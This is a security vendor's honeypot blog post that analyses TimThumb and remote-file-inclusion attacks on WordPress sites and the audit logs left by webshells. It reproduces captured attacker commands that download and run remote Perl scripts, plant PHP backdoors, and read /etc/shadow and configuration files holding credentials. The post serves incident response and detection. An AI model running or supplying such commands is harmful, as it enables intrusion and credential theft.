CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Request a Demo

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Request a Demo
Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

View All Trustwave Services
Solutions
BY INDUSTRY
BY REGULATION
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
We reduce cyber risk and fortify organizations
Awards and Accolades
Recognition by analysts and media outlets
Trustwave SpiderLabs Team
Global researchers, ethical hackers, and responders
Trustwave Fusion Security Operations Platform
Unprecedented security visibility and control
Trustwave Security Colony
Access to cybersecurity threat protection resources
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
Register
Login
Resources
BLOGS
UPCOMING
MEDIA & ASSETS
NOTICES
HELP
SpiderLabs Blog

[Honeypot Alert] Inside the Attacker's Toolbox: Webshell Usage Logging

June 19, 2013 10 minutes read Ryan Barnett

In a previous blog post, we discussed the common lifecycle of web server botnet recruitment. While installing perl IRC botnet scripts is a common tactic for post-exploitation, it is by no means the only method used to interact with or control compromised websites. This blog post will outline how attacker utilize webshell/backdoor webpages and the audit log file often left behind.

Initial Compromise

The initial attack vector most often used is either Remote File Inclusion (RFI) or WordPress Timthumb plugin PHP Code Execution. Here are example attacks which were captured today in our web honeypots:

200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:03 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:12:43 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:06 +0200] "GET /wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:08 +0200] "GET /logs/wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:15:34 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:22:49 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:24:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:29:47 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:04:10:54 +0200] "GET /wp-content/themes/TheSource/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:03 +0200] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:04 +0200] "GET /logs//wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:09:55 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:18:29 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:11 +0200] "GET //wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:12 +0200] "GET /logs//wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:25:15 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:32:33 +0200] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:33:48 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:41:43 +0200] "GET //wp-content/themes/yamidoo/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
200.151.187.18 - - [19/Jun/2013:08:58:39 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:01:47 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:20:11 +0200] "GET //wp-content/themes/EspOptimizePress/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:03:53 +0200] "GET //wp-content/themes/corporattica/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:14:38 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:20:37 +0200] "GET //wp-content/themes/digitalfarm/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:24:49 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:28:17 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:28:51 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:30:22 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:34:50 +0200] "GET //wp-content/themes/bigeasy/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:37 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:59 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:41:20 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:09 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:10 +0200] "GET /logs//wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:41 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:42 +0200] "GET /logs//wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:11:26:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:12:24:58 +0900] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 249
200.151.187.18 - - [19/Jun/2013:14:20:43 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:14:26:34 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:15:33:15 +0900] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:16:02:13 +0900] "GET //wp-content/themes/MyResume/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:17:15:16 +0900] "GET //wp-content/themes/eVidTheme/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 247

In all of these examples, the attacker is attempting to trick the PHP application into downloading/executing the remote file - hxxp://flickr.com.golfpops.com/thumbid.php.

Post-Compromise Actions

This webshell has functionality similar to the following redacted example -

11578_bff0f954-03b6-47cf-b7db-49d90d3a16eb
This webshell provides extensive funcationality for the attacker. In this screenshot, the attacker is using the "View File" component. The resulting URL looks likes this -

http://VICTIM_SITE/wp-includes/theme-compat/wp-targz.php?x=f&f=wp-config.php&d=%2Fhome%2Ffoo%2Fpublic_html &cd=2&hl=en&ct=clnk&gl=us

The "f" parameter is the file that the attacker is now viewing through this webshell. As you can see, the attacker is able to inspect the wp-config.php file contents which disclose sensitive data such as the DB username and passwords. This type of data leakage could potentially lead to deeper compromise. Other examples of actions include:

12245_e1726b45-742f-4a91-89ff-0a6cdbe5a4d2

Attackers can even edit existing files to try and remove their tracks from logs. This screenshot shows an example of editing the Apache access_log file:

8157_1a156e95-0ee7-4b5e-81aa-e3d6eda6d5dd

Webshell Usage Logging

While reviewing these webshell files, we found that many include audit logging as part of the backdoor. For example, let's look at the source of that thumbid.php script again:

11025_a4a84ce6-285d-4182-8a4c-18e82a5caa37
This section of PHP code creates audit audit log file called "x.txt" in the document root directory of the website and it logs all interactions by web clients with this webshell. Here are some examples that SpiderLabs has obtained which shows past commands used.

Example 1:

Day  : Mon, 03 Jun 2013 22:05:39 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : id_____________________________________________________________________________________Day  : Mon, 03 Jun 2013 22:05:52 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt_____________________________________________________________________________________

These entries show that the attacker first ran the "id" command to see what user the webshell was running as. She then downloaded a file, executed it and then removed the file to cleanup.

Example 2:

Day     : Wed, 05 Jun 2013 19:36:43 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:37:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:38:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/php/c100.gif ; mv c100.gif fantastico.php ; chmod +x *.php ; ls -alF_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:40:18 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat .htaccess_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:40:47 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp* ; perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:41:24 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:42:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : netstat -an | grep -i listen_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:46:06 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -al_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat /home/XXXX/public_html/blog/configuration.php_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : find `pwd` -type f -name \"*thumb*.php\" -exec ls -alF {} \\;_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:59:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp*_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:03 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:01:05 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:03:29 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:05:31 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:06:57 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:07:10 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:09:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:12 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:46 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Thu, 06 Jun 2013 13:30:30 -0500IP      : 109.167.225.109Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -alF_____________________________________________________________________________________

This particular attacker executed many commands as you can see. The most notable of which was to download and run this program -

9602_62b77213-8c7c-4242-afa2-d3230d76bcbb
The "confspy.pl" script will search home directories for users and attempt to steal their FTP credentials. Knowing that a tool like this has been run on your system widens the scope of compromise and would require your users to change all passwords to help prevent the attacker from re-gaining access even if you were to patch the original Timthumb attack vector.

Takeaways

After analyzing these types of webshell backdoors for quite some time, it is clear that the majority of these attackers are simply re-using webshells written by others. They simply modify the page TITLE or color scheme to take some cosmetic ownership of the code. This is one of the main reasons why this audit logging code persists in these webshells. In addition to the more common audit log name of "x.txt" you should also look for "logx.txt" as that has been see quite frequently as well. Hopefully this information will help you if you find that your website has been compromised and you are trying to identify what actions the attacker executed.

Latest SpiderLabs Blogs

EDR – The Multi-Tool of Security Defenses

This is Part 8 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More

The Invisible Battleground: Essentials of EASM

Know your enemy – inside and out. External Attack Surface Management tools are an effective way to understand externally facing threats and help plan cyber defenses accordingly. Let’s discuss what...

Read More

Fake Dialog Boxes to Make Malware More Convincing

Let’s explore how SpiderLabs created and incorporated user prompts, specifically Windows dialog boxes into its malware loader to make it more convincing to phishing targets during a Red Team...

Read More